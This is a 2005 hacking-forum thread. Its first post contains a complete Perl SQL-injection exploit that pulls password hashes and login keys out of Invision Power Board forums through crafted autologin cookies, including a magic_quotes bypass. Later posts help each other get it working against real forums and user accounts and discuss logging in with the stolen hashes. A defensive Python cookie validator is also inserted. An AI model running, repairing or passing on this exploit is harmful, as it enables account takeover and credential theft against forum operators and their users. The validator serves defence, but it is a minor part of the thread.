da_cash
May 16 2005, 09:26 AM
CODE
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;
$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
  if(&found(47,58)==0) { &found(96,122); }
  $char = $i;
  if ($char=="0")
  {
    if(length($allchar) > 0)
    {
      print qq{\b\b DONE ]
MEMBER ID : $member_id };
      print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
      print $allchar."\r\n";
    }
    else
    {
      print "\b\b FAILED ]";
    }
    exit();
  }
  else
  {
    $allchar .= chr(42);
  }
  $s_num++;
}

sub found($$)
{
  my $fmin = $_[0];
  my $fmax = $_[1];
  if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
  $r = int($fmax - ($fmax-$fmin)/2);
  $check = " BETWEEN $r AND $fmax";
  if ( &check($check) ) { &found($r,$fmax); }
  else { &found($fmin,$r); }
}

sub crack($$)
{
  my $cmin = $_[0];
  my $cmax = $_[1];
  $i = $cmin;
  while ($i<$cmax)
  {
    $crcheck = "=$i";
    if ( &check($crcheck) ) { return $i; }
    $i++;
  }
  $i = 0;
  return $i;
}

sub check($)
{
  $n++;
  status();
  $ccheck = $_[0];
  $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
  $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
  $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
  $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
  $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
  printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
  while(<$socket>)
  {
    if (/Set-Cookie: session_id=0;/) { return 1; }
  }
  return 0;
}

sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]"; }
  if($status==1){ print "\b\b-]"; }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]"; }
}

sub usage()
{
  print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server]    - host where IPB installed
[/folder/]  - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
  exit();
}
If anyone manages to get the member login key then please post your comments here... I've tried it on Invision 2.0.0 without success; my results were:
MEMBER ID : 2774
MEMBER_LOGIN_KEY : ********************************
KarachiKing555
May 16 2005, 07:58 PM
I wanna check this exploit but it's not working, it just pastes these lines:
CODE
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server]    - host where IPB installed
[/folder/]  - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru

No matter what I do, I'm using the right syntax. Is there any problem with the code, or with my ActivePerl settings? It seems I can't exec any .pl files! It just prints the print part of the .pl script.
thesource
May 16 2005, 08:12 PM
Even when I press option "1" for Version1 boards it still says its trying the setting for Version2. I'll check and see if I can fix it.
Edit:
Oops, it's 0 for Version 1 and 1 for Version 2.
Edit#2:
[~] SEARCHING PASSWORD ... [ DONE ]
MEMBER ID : 1
PASSWORD : ********************************
Weird^^^^
SecureD
May 20 2005, 09:47 AM
QUOTE(thesource @ May 16 2005, 08:12 PM)
... [~] SEARCHING PASSWORD ... [ DONE ]
MEMBER ID : 1
PASSWORD : ********************************
Weird^^^^

I also get the *****... back.
boshcash
May 22 2005, 03:30 PM
Me too. Tested on more than one site, I get ********** as the password. I think this exploit goes wrong when getting the admin hash...
SkullSplitter
May 24 2005, 04:26 PM
QUOTE(boshcash @ May 22 2005, 03:30 PM)
Me too. Tested on more than one site, I get ********** as the password. I think this exploit goes wrong when getting the admin hash...

MEMBER ID : 749
PASSWORD : ********************************
Tested on a normal user id.
SecureD
May 28 2005, 01:57 PM
QUOTE(SkullSplitter @ May 24 2005, 04:26 PM)
QUOTE(boshcash @ May 22 2005, 03:30 PM)
Me too. Tested on more than one site, I get ********** as the password. I think this exploit goes wrong when getting the admin hash...

MEMBER ID : 749
PASSWORD : ********************************
Tested on a normal user id.

Now I got the new tutorial: http://www.milw0rm.com/id.php?id=1014
And now I get only 000000000000000000000000000000 as hash... :S
cr00ks
Jun 3 2005, 08:56 AM
CODE
Now I got the new tutorial:
http://www.milw0rm.com/id.php?id=1014
And now I get only 000000000000000000000000000000 as hash... :S

You must first run "Perl Package Manager", paste in "install LWP::UserAgent", open a new cmd and now try the exploit.
SecureD
Jun 4 2005, 05:25 AM
QUOTE(cr00ks @ Jun 3 2005, 08:56 AM)
CODE
Now I got the new tutorial:
http://www.milw0rm.com/id.php?id=1014
And now I get only 000000000000000000000000000000 as hash... :S

You must first run "Perl Package Manager", paste in "install LWP::UserAgent", open a new cmd and now try the exploit.

I did, but it doesn't work either.
KarachiKing555
Jun 11 2005, 10:55 AM
Same results:

1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0
Final Hash: 00000000000000000000000000000000
// milw0rm.com [2005-06-08]
Iced_Eagle
Jun 27 2005, 05:14 AM
I couldn't figure out the LWP::UserAgent one for some reason... (I log into shell, and it says LWP::UserAgent is up to date, yet the exploit doesn't recognize that I have it ?)
The original poster's though, I get the same results!!
*******************
Has anyone seen a working one of these yet?
aelphaeis_mangarae
Jun 27 2005, 06:16 AM
I have had the same problem as everybody else...
You think possibly that this vulnerability isn't real, and that some how people have just taken the guys word for it and assume it exists?
JeiAr
Jun 27 2005, 11:55 AM
Well, I am the guy that discovered the issue, and yes it is real, and very dangerous, as it allows you to not only get the hash but also log in with that hash via the very same feature that you are trying to exploit. I think a lot of the exploit code doesn't work because I do not see a "Host:" field in the headers. As for the various LWP versions I have seen, all seem to work. Did any of you actually try to manually verify the issue by sending modified HTTP headers?
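The thread turns on one fact: the autologin feature reads the member_id and pass_hash cookies and feeds them into SQL, and a stored hash (or member_login_key) is only ever a 32-character hex digest. A defender can therefore refuse anything else before the query is built, and the double-encoded quote (%2527) that the first post's script relies on to get past magic_quotes is only a problem if the value is validated in its raw form rather than as the application will see it after decoding. The block below is an added example written for this thread, not code from IPB or from any poster; the function names (is_valid_pass_hash, classify_cookie_header, audit) and the sample Cookie headers are constructed for illustration.

```python
# Added defensive example (not code from the thread or from IPB): whitelist the
# IPB autologin cookies before they can reach SQL, and flag requests whose
# pass_hash carries SQL syntax. Function names and samples are constructed.
import re
from urllib.parse import unquote

# A stored IPB password hash / member_login_key is an MD5 digest: 32 hex chars.
HEX32 = re.compile(r"[0-9a-f]{32}")

# Substrings that never occur in a hex digest but do occur in an injected
# cookie value once it has been decoded the way the server decodes it.
INJECTION_MARKERS = ("'", " or ", " and ", "substring(", "ascii(", "/*")


def fully_unquote(value, max_rounds=3):
    """Percent-decode until the value stops changing, so a doubly-encoded
    quote (%2527 -> %27 -> ') is judged as the quote it becomes server-side."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_cookie_header(header):
    """Split a raw Cookie header value into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def is_valid_member_id(raw):
    """member_id is an integer primary key; accept digits only."""
    return fully_unquote(raw).isdigit()


def is_valid_pass_hash(raw):
    """Whitelist check: the cookie must be exactly one 32-char hex digest."""
    return HEX32.fullmatch(fully_unquote(raw).lower()) is not None


def classify_cookie_header(header):
    """'ok' when both autologin cookies are well-formed, 'injection' when the
    pass_hash carries SQL syntax, otherwise 'malformed'. Only 'ok' requests
    should ever reach the autologin query; the other two are worth logging."""
    cookies = parse_cookie_header(header)
    member_id = cookies.get("member_id", "")
    pass_hash = cookies.get("pass_hash", "")
    if is_valid_member_id(member_id) and is_valid_pass_hash(pass_hash):
        return "ok"
    decoded = fully_unquote(pass_hash).lower()
    if any(marker in decoded for marker in INJECTION_MARKERS):
        return "injection"
    return "malformed"


# Constructed sample Cookie headers: one legitimate (the md5 shown in the
# script's sample output), one truncated, one using the double-encoded quote.
SAMPLE_HEADERS = [
    "member_id=1; pass_hash=5f4dcc3b5aa765d61d8327deb882cf99",
    "member_id=1; pass_hash=5f4dcc3b5aa7",
    "member_id=1; pass_hash=666%2527%20OR%20(id%3D1)%20/*",
]


def audit(headers=SAMPLE_HEADERS):
    """Return (verdict, decoded pass_hash) per header, ready for a log line."""
    return [(classify_cookie_header(h),
             fully_unquote(parse_cookie_header(h).get("pass_hash", "")))
            for h in headers]


if __name__ == "__main__":
    for verdict, value in audit():
        print(f"{verdict:10s} pass_hash={value!r}")
```

Running the block prints "ok" for the well-formed header, "malformed" for the truncated one and "injection" for the double-encoded one. The point of decoding before validating is that a check on the raw cookie string would see %2527 as harmless percent-encoding; the same validator placed after decoding, or a parameterised query on the server side, removes the class of bug rather than this one payload.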
JeiAr
Jun 27 2005, 12:01 PM
Also, you need to go read this, aelphaeis_mangarae: http://www.simplemachines.org/community/in...p?topic=39395.0
I will be releasing my advisory in about a week, but script kiddies already got some exploit code and are exploiting this issue already. Hope this helps.
Iced_Eagle
Jun 28 2005, 07:54 PM
Hmmm, weird. I ran the exploit again (original poster's) and I get a new error...
QUOTE
Can't use an undefined value as a symbol reference at C:\Webserver\webroot\r57ibp2.pl line 134.
I don't know Perl at all, so I would have no clue where to start debugging this thing.

*Edit* Oh, and I tried the milw0rm one... Same results (a bunch of zeros).

*Edit2* I tried milw0rm again, and I seem to have got a working hash... Trying it out now.

*Edit3* Hash didn't seem to work with the cookie method... I'm trying something else... Oh, and it's weird. The exploit so far has worked on one forum, with one user ID... I've tried every other UserID on that forum and it says "Non-Exploitable!" but when I go back to the other UserID, it still works... Weird.

*Edit4* Okay, wow, lots of edits (better than double posting, agreed?) but I figured out why it won't work with the cookie method... Firefox erases my changes!!! It says right at the top not to edit the cookie file, and when I go to the site, it simply erases my cookies and won't log me in as the user. Any suggestions? I'm using Mozilla Firefox 1.0.4.
coolspot31
Aug 1 2005, 08:30 AM
How did you manage to get a working hash? I too am getting the results of 0's with the milw0rm one, and *'s with the original poster's. LWP::UserAgent is up to date.
ShoCK FX
Aug 2 2005, 06:38 AM
If you get all *'s it's because you haven't modified the script... You need to modify it slightly so it gives you the right output. Figure out how, it's not hard.
Tiago2
Aug 7 2005, 02:26 PM
QUOTE(ShoCK FX @ Aug 2 2005, 06:38 AM)
If you get all *'s it's because you haven't modified the script... You need to modify it slightly so it gives you the right output. Figure out how, it's not hard.

I don't know Perl. I'm having some trouble figuring out what I need to change. Do I need to modify this line?
else { $allchar .= chr(42); }
Tiago2
Aug 11 2005, 01:43 PM
I'm completely lost, arhhh.